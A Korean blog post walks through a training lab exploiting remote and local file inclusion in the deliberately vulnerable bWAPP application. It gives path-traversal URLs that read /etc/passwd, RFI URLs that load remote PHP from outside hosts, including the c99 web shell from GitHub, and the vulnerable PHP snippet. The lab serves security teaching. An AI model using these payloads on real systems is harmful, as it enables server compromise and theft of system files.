Notice
Recent Posts
Recent Comments
Link
«   2024/07   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31
Archives
Today
Total
관리 메뉴

삽질블로그

[Kali_Linux] Remote & Local File Inclusion ( RFI/LFI ) | bWAPP | Missing Functional Level Access Control 본문

카테고리 없음

[Kali_Linux] Remote & Local File Inclusion ( RFI/LFI ) | bWAPP | Missing Functional Level Access Control

삽질장인 2020. 9. 3. 21:25

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

1. Missing Functional Level Access Control

   - OWASP Top 10 A7 - 기능 수준의 접근 통제 누락

   - 접근 통제 및 검증이 서버 설정, 관리 부분에서 제대로 구성되지 않았을 때 중요 자원 접근이 가능한 취약점이다.

   - Ex) 디렉토리 접근, 파일 접근, 파일 다운로드 및 업로드

 

2. Remote & Local File Inclusion ( RFI / LFI )

   - RFI : 외부 서버에 있는 악의적인 파일을 이용하여 내부 서버에 있는 정보를 획득하는 방식

   - LFI : 내부 서버 자체적인 취약점을 이용하여 내부 서버에 있는 정보를 획득하는 방식

 

3. Missing Functional Level Access Control - Remote & Local File Inclusion ( RFI / LFI )

   - 이 시나리오는 RFI / LFI 취약점을 이용하여 서버안에 있는 정보를 획득하는 내용이다.

 

========================실습=============================

1) 첫 화면

 

2) 'English' 선택 -> Go 버튼 클릭

 

3) URL 주소 정보 확인

http://192.168.222.132/bWAPP/rlfi.php?language=lang_en.php&action=go

 

4) LFI 취약점 확인 실시

http://192.168.222.132/bWAPP/rlfi.php?language=../../../etc/passwd&action=go

 

5) RFI 취약점 확인 실시

http://192.168.20.205/bWAPP/rlfi.php?language=http://net123.tistory.com/attachment/cfile26.uf@9972323B5C72213133E1FE.php&action=go&cmd=cat%20/etc/passwd

 

6) github에서 제공하는 c99.php(웹쉘) 외부 파일 사용해서 RFI 취약점 확인 실시

http://192.168.222.132/bWAPP/rlfi.php?language=https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99/c99.php&action=go

 

7) 'rlfi.php' 파일 내용 확인

   bee@bee-box:/var/www/bWAPP$ ls -l rlfi.php

   bee@bee-box:/var/www/bWAPP$ vi rlfi.php

case "2" :

            $available_languages = array("lang_en.php", "lang_fr.php", "lang_nl.php");

            $language = $_GET["language"] . ".php";

            // $language = rlfi_check_1($language);

            break;
Comments